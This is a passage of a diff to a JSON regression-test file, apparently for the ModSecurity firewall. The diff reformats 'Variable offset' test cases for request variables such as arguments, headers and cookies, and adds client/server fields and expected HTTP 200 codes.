] }, - "expected":{ - "error_log":"o0,6v31,6t:trim" + "expected": { + "error_log": "o0,6v31,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx param2\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 3", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 3", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx am1 par\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 4", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 4", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx am1 param2 par\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_POST_NAMES", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_POST_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log": "0,6v149,6t:trim" + "expected": { + "error_log": "0,6v149,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_POST_NAMES \"@rx param1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_NAMES", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,6v17,6t:trim" + "expected": { + "error_log": "o0,6v17,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_NAMES \"@rx param1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_COMBINED_SIZE 1", - "request":{ - "headers":{ - "Host":"localhost", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_COMBINED_SIZE 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"v16,6v23,6v30,6v37,6v44,6v51,6t:trim" + "expected": { + "error_log": "v16,6v23,6v30,6v37,6v44,6v51,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_COMBINED_SIZE \"@gt 1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_COMBINED_SIZE 2", - "request":{ - "headers":{ - "Host":"localhost", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_COMBINED_SIZE 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"v16,6v23,6v30,6v37,6v44,6v51,6t:trim" + "expected": { + "error_log": "v16,6v23,6v30,6v37,6v44,6v51,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_COMBINED_SIZE \"@gt 1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_LINE", - "request":{ - "headers":{ - "Host":"localhost", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_LINE", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o23,6v0,63t:trim" + "expected": { + "error_log": "o23,6v0,63t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_LINE \"value1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_METHOD", - "request":{ - "headers":{ - "Host":"localhost", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_METHOD", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,3v0,3t:trim" + "expected": { + "error_log": "o0,3v0,3t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_METHOD \"GET\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_PROTOCOL", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_PROTOCOL", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o5,3v58,8t:trim" + "expected": { + "error_log": "o5,3v58,8t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_PROTOCOL \"1.1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - PATH_INFO", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - PATH_INFO", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o1,5v4,11t:trim" + "expected": { + "error_log": "o1,5v4,11t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule PATH_INFO \"index\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - QUERY_STRING", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - QUERY_STRING", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o7,6v16,41t:trim" + "expected": { + "error_log": "o7,6v16,41t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule QUERY_STRING \"value1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_BASENAME", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_BASENAME", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o6,4v5,10t:trim" + "expected": { + "error_log": "o6,4v5,10t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BASENAME \"html\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_URI", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_URI", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html%20%20?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html%20%20?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o7,4v4,59t:trim" + "expected": { + "error_log": "o7,4v4,59t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_URI \"html\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_URI_RAW", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_URI_RAW", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html%20%20?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html%20%20?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o7,4v4,59t:trim" + "expected": { + "error_log": "o7,4v4,59t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_URI_RAW \"html\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_HEADERS", - "request":{ - "headers":{ + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_HEADERS", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "Content-Length": "27", - "Host":"localhost", + "Host": "localhost", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,9v89,9t:trim" + "expected": { + "error_log": "o0,9v89,9t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS \"localhost\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_HEADERS:content-type", - "request":{ - "headers":{ + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_HEADERS:content-type", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "Content-Length": "27", - "Host":"localhost", + "Host": "localhost", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o14,3v163,33t:trim" + "expected": { + "error_log": "o14,3v163,33t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS \"www\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - AUTH_TYPE 1", - "request":{ - "headers":{ - "Host":"localhost", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - AUTH_TYPE 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,5v162,5t:trim" + "expected": { + "error_log": "o0,5v162,5t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule AUTH_TYPE \"Basic\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - AUTH_TYPE 2", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - AUTH_TYPE 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,5v79,5t:trim" + "expected": { + "error_log": "o0,5v79,5t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule AUTH_TYPE \"Basic\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_HEADERS_NAMES", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_HEADERS_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,4v64,13t:lowercase" + "expected": { + "error_log": "o0,4v64,13t:lowercase", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS_NAMES \"auth\" \"id:1,phase:2,pass,t:lowercase,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES 1", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o1,2v216,3t:lowercase" + "expected": { + "error_log": "o1,2v216,3t:lowercase", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES \"es\" \"id:1,phase:2,pass,t:lowercase,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES 2", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,1v223,1t:lowercase" + "expected": { + "error_log": "o0,1v223,1t:lowercase", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES \"z\" \"id:1,phase:2,pass,t:lowercase,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES 3", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES 3", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,1v228,1t:lowercase,t:trim" + "expected": { + "error_log": "o0,1v228,1t:lowercase,t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES \"b\" \"id:1,phase:2,pass,t:lowercase,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES_NAMES", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
